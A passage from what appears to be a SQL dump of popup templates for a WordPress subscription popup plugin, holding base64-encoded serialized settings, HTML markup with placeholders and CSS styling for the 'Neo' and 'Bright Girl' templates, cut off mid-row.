Neo',1,0,'YTozOntzOjQ6Im1haW4iO2E6Mjc6e3M6Nzoic2hvd19vbiI7czo5OiJwYWdlX2xvYWQiO3M6MjM6InNob3dfb25fcGFnZV9sb2FkX2RlbGF5IjtzOjA6IiI7czoyNToic2hvd19vbl9jbGlja19vbl9lbF9kZWxheSI7czoxOiIwIjtzOjI3OiJzaG93X29uX3Njcm9sbF93aW5kb3dfZGVsYXkiO3M6MToiMCI7czozMzoic2hvd19vbl9zY3JvbGxfd2luZG93X3BlcmNfc2Nyb2xsIjtzOjE6IjAiO3M6MjU6InNob3dfb25fbGlua19mb2xsb3dfZGVsYXkiO3M6MToiMCI7czo4OiJjbG9zZV9vbiI7czoxMDoidXNlcl9jbG9zZSI7czoxMDoic2hvd19wYWdlcyI7czozOiJhbGwiO3M6MTQ6InNob3dfdGltZV9mcm9tIjtzOjc6IjEyOjAwYW0iO3M6MTI6InNob3dfdGltZV90byI7czo3OiIxMjowMGFtIjtzOjE0OiJzaG93X2RhdGVfZnJvbSI7czowOiIiO3M6MTI6InNob3dfZGF0ZV90byI7czowOiIiO3M6Nzoic2hvd190byI7czo4OiJldmVyeW9uZSI7czoyOToic2hvd190b19maXJzdF90aW1lX3Zpc2l0X2RheXMiO3M6MjoiMzAiO3M6MzA6InNob3dfdG9fdW50aWxfbWFrZV9hY3Rpb25fZGF5cyI7czoyOiIzMCI7czoxNToiY291bnRfdGltZXNfbnVtIjtzOjE6IjEiO3M6MTU6ImNvdW50X3RpbWVzX21lcyI7czozOiJkYXkiO3M6MjE6ImhpZGVfZm9yX2RldmljZXNfc2hvdyI7czoxOiIwIjtzOjI0OiJoaWRlX2Zvcl9wb3N0X3R5cGVzX3Nob3ciO3M6MToiMCI7czoxNzoiaGlkZV9mb3JfaXBzX3Nob3ciO3M6MToiMCI7czoxMjoiaGlkZV9mb3JfaXBzIjtzOjA6IiI7czoyMzoiaGlkZV9mb3JfY291bnRyaWVzX3Nob3ciO3M6MToiMCI7czoyMzoiaGlkZV9mb3JfbGFuZ3VhZ2VzX3Nob3ciO3M6MToiMCI7czoyNDoiaGlkZV9zZWFyY2hfZW5naW5lc19zaG93IjtzOjE6IjAiO3M6MTg6ImhpZGVfcHJlZ191cmxfc2hvdyI7czoxOiIwIjtzOjEzOiJoaWRlX3ByZWdfdXJsIjtzOjA6IiI7czoyNDoiaGlkZV9mb3JfdXNlcl9yb2xlc19zaG93IjtzOjE6IjAiO31zOjM6InRwbCI7YTo2Mjp7czo1OiJ3aWR0aCI7czozOiI4MjQiO3M6MTM6IndpZHRoX21lYXN1cmUiO3M6MjoicHgiO3M6MTg6ImJnX292ZXJsYXlfb3BhY2l0eSI7czozOiIwLjUiO3M6OToiYmdfdHlwZV8wIjtzOjU6ImNvbG9yIjtzOjg6ImJnX2ltZ18wIjtzOjA6IiI7czoxMDoiYmdfY29sb3JfMCI7czo3OiIjZjRmNGY0IjtzOjk6ImJnX3R5cGVfMSI7czozOiJpbWciO3M6ODoiYmdfaW1nXzEiO3M6NDI6IltQUFNfQVNTRVRTX1VSTF1pbWcvYXNzZXRzL25ldy1mb3JtLWJnLnBuZyI7czoxMDoiYmdfY29sb3JfMSI7czo3OiIjNGQ0ZDRkIjtzOjk6ImJnX3R5cGVfMiI7czo1OiJjb2xvciI7czo4OiJiZ19pbWdfMiI7czowOiIiO3M6MTA6ImJnX2NvbG9yXzIiO3M6NzoiIzAwZWFlYSI7czo5OiJiZ190eXBlXzMiO3M6MzoiaW1nIjtzOjg6ImJnX2ltZ18zIjtzOjQ0OiJbUFBTX0FTU0VUU19VUkxdaW1nL2Fzc2V0cy9uZXctZm9ybS1sb2dvLnBuZyI7czoxMDoiYmdfY29sb3JfMyI7czo3OiIjYzZjNmM2IjtzOjEwOiJmb250X2xhYmVsIjtzOjc6ImRlZmF1bHQiO3M6MTY6ImxhYmVsX2ZvbnRfY29sb3IiO3M6NzoiIzAwMDAwMCI7czoxMDoiZm9udF90eHRfMCI7czo3OiJkZWZhdWx0IjtzOjE3OiJ0ZXh0X2ZvbnRfY29sb3JfMCI7czo3OiIjMDAwMDAwIjtzOjExOiJmb250X2Zvb3RlciI7czo3OiJkZWZhdWx0IjtzOjE3OiJmb290ZXJfZm9udF9jb2xvciI7czo3OiIjMDAwMDAwIjtzOjE3OiJyZWlkcmVjdF9vbl9jbG9zZSI7czowOiIiO3M6OToiY2xvc2VfYnRuIjtzOjIwOiJjaXJjbGVfYmlnX25ld19jbG9zZSI7czo3OiJidWxsZXRzIjtzOjE0OiJjaXJjbGVfYmlnX25ldyI7czoxMToibGF5ZXJlZF9wb3MiO3M6MDoiIjtzOjk6ImVuYl9sYWJlbCI7czoxOiIxIjtzOjU6ImxhYmVsIjtzOjEwNzoiVGhlIEJlc3QgV29yZFByZXNzIFBvcFVwIG9wdGluIHBsdWdpbiB0byBoZWxwIHlvdSBnYWluIG1vcmUgc3Vic2NyaWJlcnMsIHNvY2lhbCBmb2xsb3dlcnMgb3IgYWR2ZXJ0aXNlbWVudC4iO3M6OToiZW5iX3R4dF8wIjtzOjE6IjEiO3M6MTM6ImVuYl9mb290X25vdGUiO3M6MToiMSI7czo5OiJmb290X25vdGUiO3M6MTE5OiJXZSByZXNwZWN0IHlvdXIgcHJpdmFjeS4NCllvdXIgaW5mb3JtYXRpb24gd2lsbCBub3QgYmUgc2hhcmVkIHdpdGggYW55IHRoaXJkIHBhcnR5IGFuZCB5b3UgY2FuIHVuc3Vic2NyaWJlIGF0IGFueSB0aW1lICI7czoxNToiZW5iX3NtX2ZhY2Vib29rIjtzOjE6IjEiO3M6MTc6ImVuYl9zbV9nb29nbGVwbHVzIjtzOjE6IjEiO3M6MTQ6ImVuYl9zbV90d2l0dGVyIjtzOjE6IjEiO3M6OToic21fZGVzaWduIjtzOjY6InNpbXBsZSI7czo4OiJhbmltX2tleSI7czo0OiJub25lIjtzOjEzOiJhbmltX2R1cmF0aW9uIjtzOjA6IiI7czoxMzoiZW5iX3N1YnNjcmliZSI7czoxOiIxIjtzOjg6InN1Yl9kZXN0IjtzOjk6IndvcmRwcmVzcyI7czoyMzoic3ViX3dwX2NyZWF0ZV91c2VyX3JvbGUiO3M6MTA6InN1YnNjcmliZXIiO3M6MTk6InN1Yl9hd2ViZXJfbGlzdG5hbWUiO3M6MDoiIjtzOjIxOiJzdWJfYXdlYmVyX2FkdHJhY2tpbmciO3M6MDoiIjtzOjIxOiJzdWJfbWFpbGNoaW1wX2FwaV9rZXkiO3M6MDoiIjtzOjI1OiJzdWJfbWFpbGNoaW1wX2dyb3Vwc19mdWxsIjtzOjA6IiI7czoxMDoic3ViX2ZpZWxkcyI7YToyOntzOjQ6Im5hbWUiO2E6Nzp7czozOiJlbmIiO3M6MToiMSI7czo0OiJuYW1lIjtzOjQ6Im5hbWUiO3M6NDoiaHRtbCI7czo0OiJ0ZXh0IjtzOjU6ImxhYmVsIjtzOjQ6Ik5hbWUiO3M6NToidmFsdWUiO3M6MDoiIjtzOjY6ImN1c3RvbSI7czoxOiIwIjtzOjk6Im1hbmRhdG9yeSI7czoxOiIwIjt9czo1OiJlbWFpbCI7YTo3OntzOjQ6Im5hbWUiO3M6NToiZW1haWwiO3M6NDoiaHRtbCI7czo0OiJ0ZXh0IjtzOjU6ImxhYmVsIjtzOjY6IkUtTWFpbCI7czo1OiJ2YWx1ZSI7czowOiIiO3M6NjoiY3VzdG9tIjtzOjE6IjAiO3M6OToibWFuZGF0b3J5IjtzOjE6IjEiO3M6MzoiZW5iIjtzOjE6IjEiO319czoyMDoic3ViX3R4dF9jb25maXJtX3NlbnQiO3M6Njc6IkNvbmZpcm1hdGlvbiBsaW5rIHdhcyBzZW50IHRvIHlvdXIgZW1haWwgYWRkcmVzcy4gQ2hlY2sgeW91ciBlbWFpbCEiO3M6MTU6InN1Yl90eHRfc3VjY2VzcyI7czoyNDoiVGhhbmsgeW91IGZvciBzdWJzY3JpYmUhIjtzOjIxOiJzdWJfdHh0X2ludmFsaWRfZW1haWwiO3M6MjI6IkVtcHR5IG9yIGludmFsaWQgZW1haWwiO3M6MjA6InN1Yl90eHRfZXhpc3RzX2VtYWlsIjtzOjIyOiJFbXB0eSBvciBpbnZhbGlkIGVtYWlsIjtzOjE2OiJzdWJfcmVkaXJlY3RfdXJsIjtzOjA6IiI7czoyODoic3ViX3R4dF9jb25maXJtX21haWxfc3ViamVjdCI7czozNDoiQ29uZmlybSBzdWJzY3JpcHRpb24gb24gW3NpdGVuYW1lXSI7czoyNToic3ViX3R4dF9jb25maXJtX21haWxfZnJvbSI7czoxNDoiYWRtaW5AbWFpbC5jb20iO3M6Mjg6InN1Yl90eHRfY29uZmlybV9tYWlsX21lc3NhZ2UiO3M6MTk3OiJZb3Ugc3Vic2NyaWJlZCBvbiBzaXRlIDxhIGhyZWY9XCJbc2l0ZXVybF1cIj5bc2l0ZW5hbWVdPC9hPi4gRm9sbG93IDxhIGhyZWY9XCJbY29uZmlybV9saW5rXVwiPnRoaXMgbGluazwvYT4gdG8gY29tcGxldGUgeW91ciBzdWJzY3JpcHRpb24uIElmIHlvdSBkaWQgbm90IHN1YnNjcmliZSBoZXJlIC0ganVzdCBpZ25vcmUgdGhpcyBtZXNzYWdlLiI7czozMToic3ViX3R4dF9zdWJzY3JpYmVyX21haWxfc3ViamVjdCI7czozNzoiW3NpdGVuYW1lXSBZb3VyIHVzZXJuYW1lIGFuZCBwYXNzd29yZCI7czoyODoic3ViX3R4dF9zdWJzY3JpYmVyX21haWxfZnJvbSI7czoxNDoiYWRtaW5AbWFpbC5jb20iO3M6MzE6InN1Yl90eHRfc3Vic2NyaWJlcl9tYWlsX21lc3NhZ2UiO3M6NjU6IlVzZXJuYW1lOiBbdXNlcl9sb2dpbl08YnIgLz5QYXNzd29yZDogW3Bhc3N3b3JkXTxiciAvPltsb2dpbl91cmxdIjtzOjI1OiJzdWJfcmVkaXJlY3RfZW1haWxfZXhpc3RzIjtzOjA6IiI7czoxMzoic3ViX2J0bl9sYWJlbCI7czo4OiJTSUdOLVVQISI7czoxMzoic3ViX25ld19lbWFpbCI7czoxNDoiYWRtaW5AbWFpbC5jb20iO3M6MTU6InN1Yl9uZXdfc3ViamVjdCI7czo0MDoiTmV3IFN1YnNjcmliZXIgb24gTXkgV29yZFByZXNzIFRlc3QgU2l0ZSI7czoxNToic3ViX25ld19tZXNzYWdlIjtzOjEyOToiWW91IGhhdmUgbmV3IHN1YnNjcmliZXIgb24geW91ciBzaXRlIDxhIGhyZWY9XCJbc2l0ZXVybF1cIj5bc2l0ZW5hbWVdPC9hPiwgaGVyZSB1cyBzdWJzY3JpYmVyIGluZm9ybWF0aW9uOjxiciAvPltzdWJzY3JpYmVyX2RhdGFdIjtzOjEyOiJzdGF0X2dhX2NvZGUiO3M6MDoiIjtzOjU6InR4dF8wIjtzOjM4MToiPHA+UG9wdXAgYnkgU3Vwc3lzdGljIGxldHMgeW91IGVhc2lseSBjcmVhdGUgZWxlZ2FudCBvdmVybGFwcGluZyB3aW5kb3dzIHdpdGggdW5saW1pdGVkIGZlYXR1cmVzLiBQb3AtdXBzIHdpdGggU2xpZGVyLCBMaWdodGJveCwgQ29udGFjdCBhbmQgU3Vic2NyaXB0aW9uIGZvcm1zIGFuZCBtb3JlOjwvcD48dWw+PGxpPjxzdHJvbmc+VW5saW1pdGVkIENvbnRlbnQgQ3VzdG9taXphdGlvbjwvc3Ryb25nPjwvbGk+PGxpPjxzdHJvbmc+QXV0byBPcGVuIFBvcHVwczwvc3Ryb25nPjwvbGk+PGxpPjxzdHJvbmc+Q29udGFjdCBGb3JtIHdpdGggcG9wLXVwPC9zdHJvbmc+PC9saT48bGk+PHN0cm9uZz5Qb3B1cCBPcGVuaW5nIEFuaW1hdGlvPC9zdHJvbmc+bnM8L2xpPjwvdWw+Ijt9czoxMDoib3B0c19hdHRycyI7YToyOntzOjk6ImJnX251bWJlciI7czoxOiI0IjtzOjE2OiJ0eHRfYmxvY2tfbnVtYmVyIjtzOjE6IjEiO319','<link href=\"https://fonts.googleapis.com/css?family=Montserrat\" rel=\"stylesheet\"> \r\n<div id=\"ppsPopupShell_[ID]\" class=\"ppsPopupShell ppsPopupListsShell\">\r\n	<a href=\"#\" class=\"ppsPopupClose ppsPopupClose_[close_btn]\"></a>\r\n	<div class=\"ppsInnerTblContent\">\r\n		<div class=\"ppsPopupListsInner ppsPopupInner\">\r\n			[if enb_label]\r\n				<div class=\"ppsPopupLabel ppsPopupListsLabel\">[label]</div>\r\n			[endif]\r\n			<div style=\"clear: both;\"></div>\r\n			[if enb_txt_0]\r\n				<div class=\"ppsPopupTxt ppsPopupClassyTxt ppsPopupClassyTxt_0 ppsPopupTxt_0\">\r\n				[txt_0]\r\n				</div>\r\n			[endif]\r\n			<div style=\"clear: both;\"></div>\r\n		</div>\r\n		<div class=\"ppsRightCol\">\r\n			[if enb_subscribe]\r\n				<div class=\"ppsSubscribeShell\">\r\n					[sub_form_start]\r\n					[sub_fields_html]\r\n					<input type=\"submit\" name=\"submit\" value=\"[sub_btn_label]\" />\r\n					[sub_form_end]\r\n					<div style=\"clear: both;\"></div>\r\n				</div>\r\n			[endif]\r\n			[if enb_sm]\r\n				<div class=\"ppsSm\">\r\n				[sm_html]\r\n				</div>\r\n			[endif]\r\n			[if enb_foot_note]\r\n				<div class=\"ppsFootNote\">\r\n				[foot_note]\r\n				</div>\r\n			[endif]\r\n          	[if bg_type_3 == \'img\']\r\n				<img src=\"[bg_img_3]\" class=\"ppsLogo\" />\r\n			[endif]\r\n		</div>\r\n	</div>\r\n</div>','#ppsPopupShell_[ID] {\r\n	width: [width][width_measure];\r\n  	padding: 15px;\r\n  	font-family: \"Montserrat\",\"Trebuchet MS\",\"Helvetica Neue\",Helvetica,Arial,Sans-Serif;\r\n	font-size: 13px;\r\n	line-height: 21px;\r\n	font-weight: normal;\r\n	color: #4d4d4d;\r\n}\r\n#ppsPopupShell_[ID], #ppsPopupShell_[ID] * {\r\n	-webkit-box-sizing: border-box;\r\n	-moz-box-sizing:    border-box;\r\n	box-sizing:         border-box;\r\n}\r\n#ppsPopupShell_[ID] .ppsInnerTblContent {\r\n	display: table;\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupInner {\r\n  {% if popup.params.tpl.enb_subscribe or popup.params.tpl.enb_foot_note or popup.params.tpl.enb_sm %}\r\n  	width: 66%;\r\n	[else]\r\n  	width: 100%;\r\n  	[endif]\r\n  	display: table-cell;\r\n  	vertical-align: top;\r\n  	padding: 30px 20px;\r\n	[if bg_type_0 == \'color\']\r\n	background-color: [bg_color_0];\r\n  	background-image: none;\r\n  	[elseif bg_type_0 == \'img\']\r\n  	background-image: url(\"[bg_img_0]\");\r\n  	background-repeat: no-repeat;\r\n  	background-size: cover;\r\n  	[endif]\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupLabel {\r\n	font-size: 30px;\r\n	letter-spacing: -1px;\r\n	line-height: 40px;\r\n	margin-bottom: 15px;\r\n}\r\n#ppsPopupShell_[ID] .ppsRightCol {\r\n	display: table-cell;\r\n  	width: 34%;\r\n  	height: 100%;\r\n  	text-align: center;\r\n  	[if bg_type_1 == \'color\']\r\n  	background: -moz-radial-gradient(center, ellipse cover, {{ adjust_brightness(popup.params.tpl.bg_color_1, 50) }} 0%, [bg_color_1] 100%); /* ff3.6+ */\r\n	background: -webkit-gradient(radial, center center, 0px, center center, 100%, color-stop(0%, {{ adjust_brightness(popup.params.tpl.bg_color_1, 50) }}), color-stop(100%, [bg_color_1])); /* safari4+,chrome */\r\n	background:-webkit-radial-gradient(center, ellipse cover, {{ adjust_brightness(popup.params.tpl.bg_color_1, 50) }} 0%, [bg_color_1] 100%); /* safari5.1+,chrome10+ */\r\n	background: -o-radial-gradient(center, ellipse cover, {{ adjust_brightness(popup.params.tpl.bg_color_1, 50) }} 0%, [bg_color_1] 100%); /* opera 11.10+ */\r\n	background: -ms-radial-gradient(center, ellipse cover, {{ adjust_brightness(popup.params.tpl.bg_color_1, 50) }} 0%, [bg_color_1] 100%); /* ie10+ */\r\n  background:radial-gradient(ellipse at center, {{ adjust_brightness(popup.params.tpl.bg_color_1, 50) }} 0%, [bg_color_1] 100%); /* w3c */\r\n	filter: progid:DXImageTransform.Microsoft.gradient( startColorstr=\'{{ adjust_brightness(popup.params.tpl.bg_color_1, 50) }}\', endColorstr=\'[bg_color_1]\',GradientType=1 ); /* ie6-9 */\r\n  	[elseif bg_type_1 == \'img\']\r\n  	background-color: [bg_color_1];\r\n  	background-image: url(\"[bg_img_1]\");\r\n  	background-repeat: no-repeat;\r\n  	background-size: cover;\r\n  	[endif]\r\n  \r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell form {\r\n	padding: 30px 30px 0;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell input,\r\n#ppsPopupShell_[ID] .ppsSubscribeShell .ppsSubSelect,\r\n#ppsPopupShell_[ID] .ppsSubscribeShell textarea {\r\n	width: 100%;\r\n  	margin-bottom: 10px;\r\n  	height: 40px;\r\n  	border: none;\r\n  	border-radius: 0;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell input[type=text],#ppsPopupShell_[ID] .ppsSubscribeShell input[type=email],#ppsPopupShell_[ID] .ppsSubscribeShell input[type=password],#ppsPopupShell_[ID] .ppsSubscribeShell input[type=email],\r\n#ppsPopupShell_[ID] .ppsSubscribeShell .ppsSubSelect,\r\n#ppsPopupShell_[ID] .ppsSubscribeShell textarea {\r\n  	padding-left: 10px;\r\n  	font-size: 17px;\r\n  	background-color: #fff;\r\n  	display: block;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell .ppsSubSelect {\r\n	display: table;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell .ppsSubSelectLabel,\r\n#ppsPopupShell_[ID] .ppsSubscribeShell select {\r\n	display: table-cell;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell .ppsSubSelectLabel {\r\n	opacity: 0.5;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell select {\r\n	width: 100%;\r\n  	background-color: transparent;\r\n  	height: 40px;\r\n  	border: none;\r\n  	margin-left: -5px;\r\n  	font-size: 17px;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell textarea {\r\n	font-family: inherit;\r\n  	height: auto;\r\n    padding-top: 5px;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell input[type=submit] {\r\n  	[if bg_type_2 == \'color\']\r\n  	background-color: [bg_color_2];\r\n  	border-bottom: 3px solid {{ adjust_brightness(popup.params.tpl.bg_color_2, -50) }};\r\n  	background-image: none;\r\n  	[elseif bg_type_2 == \'img\']\r\n  	background-image: url(\"[bg_img_2]\");\r\n  	background-repeat: no-repeat;\r\n  	background-size: cover;\r\n  	[endif]\r\n  	color: #fff;\r\n    font-size: 20px;\r\n  	cursor: pointer;\r\n  	padding: 0;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell input[type=submit]:hover {\r\n	box-shadow: inset 2px 2px 1px #555;\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupTxt_0 {\r\n  	text-align: left;\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupTxt_0 ul {\r\n	padding: 0;\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupClose {\r\n	background-repeat: no-repeat;\r\n  	cursor: pointer;\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupClose.ppsPopupClose_lists_black {\r\n 	top: 0 !important;\r\n  	right: 0 !important;\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupClose:hover {\r\n	opacity: 0.8;\r\n}\r\n#ppsPopupShell_[ID] .ppsFootNote{\r\n	color: #fff;\r\n    font-size: x-small;\r\n    line-height: 14px;\r\n  	margin: 5px 30px 15px;\r\n}\r\n#ppsPopupShell_[ID] .ppsLogo {\r\n	\r\n}','list-building-neo.jpg',1,1,1,1,0,0,0,'2015-01-10 17:59:43',1,0),(41,'Bright Girl',1,0,'YTozOntzOjQ6Im1haW4iO2E6Mjc6e3M6Nzoic2hvd19vbiI7czo5OiJwYWdlX2xvYWQiO3M6MjM6InNob3dfb25fcGFnZV9sb2FkX2RlbGF5IjtzOjA6IiI7czoyNToic2hvd19vbl9jbGlja19vbl9lbF9kZWxheSI7czoxOiIwIjtzOjI3OiJzaG93X29uX3Njcm9sbF93aW5kb3dfZGVsYXkiO3M6MToiMCI7czozMzoic2hvd19vbl9zY3JvbGxfd2luZG93X3BlcmNfc2Nyb2xsIjtzOjE6IjAiO3M6MjU6InNob3dfb25fbGlua19mb2xsb3dfZGVsYXkiO3M6MToiMCI7czo4OiJjbG9zZV9vbiI7czoxMDoidXNlcl9jbG9zZSI7czoxMDoic2hvd19wYWdlcyI7czozOiJhbGwiO3M6MTQ6InNob3dfdGltZV9mcm9tIjtzOjc6IjEyOjAwYW0iO3M6MTI6InNob3dfdGltZV90byI7czo3OiIxMjowMGFtIjtzOjE0OiJzaG93X2RhdGVfZnJvbSI7czowOiIiO3M6MTI6InNob3dfZGF0ZV90byI7czowOiIiO3M6Nzoic2hvd190byI7czo4OiJldmVyeW9uZSI7czoyOToic2hvd190b19maXJzdF90aW1lX3Zpc2l0X2RheXMiO3M6MjoiMzAiO3M6MzA6InNob3dfdG9fdW50aWxfbWFrZV9hY3Rpb25fZGF5cyI7czoyOiIzMCI7czoxNToiY291bnRfdGltZXNfbnVtIjtzOjE6IjEiO3M6MTU6ImNvdW50X3RpbWVzX21lcyI7czozOiJkYXkiO3M6MjE6ImhpZGVfZm9yX2RldmljZXNfc2hvdyI7czoxOiIwIjtzOjI0OiJoaWRlX2Zvcl9wb3N0X3R5cGVzX3Nob3ciO3M6MToiMCI7czoxNzoiaGlkZV9mb3JfaXBzX3Nob3ciO3M6MToiMCI7czoxMjoiaGlkZV9mb3JfaXBzIjtzOjA6IiI7czoyMzoiaGlkZV9mb3JfY291bnRyaWVzX3Nob3ciO3M6MToiMCI7czoyMzoiaGlkZV9mb3JfbGFuZ3VhZ2VzX3Nob3ciO3M6MToiMCI7czoyNDoiaGlkZV9zZWFyY2hfZW5naW5lc19zaG93IjtzOjE6IjAiO3M6MTg6ImhpZGVfcHJlZ191cmxfc2hvdyI7czoxOiIwIjtzOjEzOiJoaWRlX3ByZWdfdXJsIjtzOjA6IiI7czoyNDoiaGlkZV9mb3JfdXNlcl9yb2xlc19zaG93IjtzOjE6IjAiO31zOjM6InRwbCI7YTo2Mjp7czo1OiJ3aWR0aCI7czozOiI4MDAiO3M6MTM6IndpZHRoX21lYXN1cmUiO3M6MjoicHgiO3M6MTg6ImJnX292ZXJsYXlfb3BhY2l0eSI7czozOiIwLjUiO3M6OToiYmdfdHlwZV8wIjtzOjU6ImNvbG9yIjtzOjg6ImJnX2ltZ18wIjtzOjQxOiJbUFBTX0FTU0VUU19VUkxdaW1nL2Fzc2V0cy9iYWNrZ3JvdW5kLmpwZyI7czoxMDoiYmdfY29sb3JfMCI7czo3OiIjOTkwYTIyIjtzOjk6ImJnX3R5cGVfMSI7czo1OiJjb2xvciI7czo4OiJiZ19pbWdfMSI7czozOToiW1BQU19BU1NFVFNfVVJMXWltZy9hc3NldHMvYnV0dG9uLTEucG5nIjtzOjEwOiJiZ19jb2xvcl8xIjtzOjc6IiNmZmZmZmYiO3M6OToiYmdfdHlwZV8yIjtzOjM6ImltZyI7czo4OiJiZ19pbWdfMiI7czozNzoiW1BQU19BU1NFVFNfVVJMXWltZy9hc3NldHMvZ2lybC0yLnBuZyI7czoxMDoiYmdfY29sb3JfMiI7czowOiIiO3M6OToiYmdfdHlwZV8zIjtzOjU6ImNvbG9yIjtzOjg6ImJnX2ltZ18zIjtzOjA6IiI7czoxMDoiYmdfY29sb3JfMyI7czo3OiIjM2QzZDNkIjtzOjEwOiJmb250X2xhYmVsIjtzOjc6ImRlZmF1bHQiO3M6MTY6ImxhYmVsX2ZvbnRfY29sb3IiO3M6NzoiI2ZmNDQxMSI7czoxMDoiZm9udF90eHRfMCI7czo3OiJkZWZhdWx0IjtzOjE3OiJ0ZXh0X2ZvbnRfY29sb3JfMCI7czo3OiIjMDAwMDAwIjtzOjExOiJmb250X2Zvb3RlciI7czo3OiJkZWZhdWx0IjtzOjE3OiJmb290ZXJfZm9udF9jb2xvciI7czo3OiIjOTc5Njk2IjtzOjE1OiJyZXNwb25zaXZlX21vZGUiO3M6MzoiZGVmIjtzOjE3OiJyZWlkcmVjdF9vbl9jbG9zZSI7czowOiIiO3M6OToiY2xvc2VfYnRuIjtzOjI3OiJjbG9zZS1ibGFjay1pbi13aGl0ZS1jaXJjbGUiO3M6NzoiYnVsbGV0cyI7czo0OiJ0aWNrIjtzOjExOiJsYXllcmVkX3BvcyI7czowOiIiO3M6OToiZW5iX2xhYmVsIjtzOjE6IjEiO3M6NToibGFiZWwiO3M6MjI6IlN1YnNjcmliZSBhbmQgR2V0IE5ld3MiO3M6OToiZW5iX3R4dF8wIjtzOjE6IjEiO3M6OToiZm9vdF9ub3RlIjtzOjExNzoiV2UgcmVzcGVjdCB5b3VyIHByaXZhY3kuIFlvdXIgaW5mb3JtYXRpb24gd2lsbCBub3QgYmUgc2hhcmVkIHdpdGggYW55IHRoaXJkIHBhcnR5IGFuZCB5b3UgY2FuIHVuc3Vic2NyaWJlIGF0IGFueSB0aW1lIjtzOjE1OiJlbmJfc21fZmFjZWJvb2siO3M6MToiMSI7czoxNzoiZW5iX3NtX2dvb2dsZXBsdXMiO3M6MToiMSI7czoxNDoiZW5iX3NtX3R3aXR0ZXIiO3M6MToiMSI7czo5OiJzbV9kZXNpZ24iO3M6Njoic2ltcGxlIjtzOjg6ImFuaW1fa2V5IjtzOjQ6Im5vbmUiO3M6MTM6ImFuaW1fZHVyYXRpb24iO3M6MDoiIjtzOjEzOiJlbmJfc3Vic2NyaWJlIjtzOjE6IjEiO3M6ODoic3ViX2Rlc3QiO3M6OToid29yZHByZXNzIjtzOjIzOiJzdWJfd3BfY3JlYXRlX3VzZXJfcm9sZSI7czoxMDoic3Vic2NyaWJlciI7czoxOToic3ViX2F3ZWJlcl9saXN0bmFtZSI7czowOiIiO3M6MjE6InN1Yl9hd2ViZXJfYWR0cmFja2luZyI7czowOiIiO3M6MjE6InN1Yl9tYWlsY2hpbXBfYXBpX2tleSI7czowOiIiO3M6MjU6InN1Yl9tYWlsY2hpbXBfZ3JvdXBzX2Z1bGwiO3M6MDoiIjtzOjEwOiJzdWJfZmllbGRzIjthOjI6e3M6NDoibmFtZSI7YTo2OntzOjQ6Im5hbWUiO3M6NDoibmFtZSI7czo0OiJodG1sIjtzOjQ6InRleHQiO3M6NToibGFiZWwiO3M6NDoiTmFtZSI7czo1OiJ2YWx1ZSI7czowOiIiO3M6NjoiY3VzdG9tIjtzOjE6IjAiO3M6OToibWFuZGF0b3J5IjtzOjE6IjAiO31zOjU6ImVtYWlsIjthOjc6e3M6NDoibmFtZSI7czo1OiJlbWFpbCI7czo0OiJodG1sIjtzOjQ6InRleHQiO3M6NToibGFiZWwiO3M6NjoiRS1NYWlsIjtzOjU6InZhbHVlIjtzOjA6IiI7czo2OiJjdXN0b20iO3M6MToiMCI7czo5OiJtYW5kYXRvcnkiO3M6MToiMSI7czozOiJlbmIiO3M6MToiMSI7fX1zOjIwOiJzdWJfdHh0X2NvbmZpcm1fc2VudCI7czo2NzoiQ29uZmlybWF0aW9uIGxpbmsgd2FzIHNlbnQgdG8geW91ciBlbWFpbCBhZGRyZXNzLiBDaGVjayB5b3VyIGVtYWlsISI7czoxNToic3ViX3R4dF9zdWNjZXNzIjtzOjI0OiJUaGFuayB5b3UgZm9yIHN1YnNjcmliZSEiO3M6MjE6InN1Yl90eHRfaW52YWxpZF9lbWFpbCI7czoyMjoiRW1wdHkgb3IgaW52YWxpZCBlbWFpbCI7czoyMDoic3ViX3R4dF9leGlzdHNfZW1haWwiO3M6MjI6IkVtcHR5IG9yIGludmFsaWQgZW1haWwiO3M6MTY6InN1Yl9yZWRpcmVjdF91cmwiO3M6MDoiIjtzOjI4OiJzdWJfdHh0X2NvbmZpcm1fbWFpbF9zdWJqZWN0IjtzOjM0OiJDb25maXJtIHN1YnNjcmlwdGlvbiBvbiBbc2l0ZW5hbWVdIjtzOjI1OiJzdWJfdHh0X2NvbmZpcm1fbWFpbF9mcm9tIjtzOjE0OiJhZG1pbkBtYWlsLmNvbSI7czoyODoic3ViX3R4dF9jb25maXJtX21haWxfbWVzc2FnZSI7czoxOTc6IllvdSBzdWJzY3JpYmVkIG9uIHNpdGUgPGEgaHJlZj1cIltzaXRldXJsXVwiPltzaXRlbmFtZV08L2E+LiBGb2xsb3cgPGEgaHJlZj1cIltjb25maXJtX2xpbmtdXCI+dGhpcyBsaW5rPC9hPiB0byBjb21wbGV0ZSB5b3VyIHN1YnNjcmlwdGlvbi4gSWYgeW91IGRpZCBub3Qgc3Vic2NyaWJlIGhlcmUgLSBqdXN0IGlnbm9yZSB0aGlzIG1lc3NhZ2UuIjtzOjMxOiJzdWJfdHh0X3N1YnNjcmliZXJfbWFpbF9zdWJqZWN0IjtzOjM3OiJbc2l0ZW5hbWVdIFlvdXIgdXNlcm5hbWUgYW5kIHBhc3N3b3JkIjtzOjI4OiJzdWJfdHh0X3N1YnNjcmliZXJfbWFpbF9mcm9tIjtzOjE0OiJhZG1pbkBtYWlsLmNvbSI7czozMToic3ViX3R4dF9zdWJzY3JpYmVyX21haWxfbWVzc2FnZSI7czo2NToiVXNlcm5hbWU6IFt1c2VyX2xvZ2luXTxiciAvPlBhc3N3b3JkOiBbcGFzc3dvcmRdPGJyIC8+W2xvZ2luX3VybF0iO3M6MjU6InN1Yl9yZWRpcmVjdF9lbWFpbF9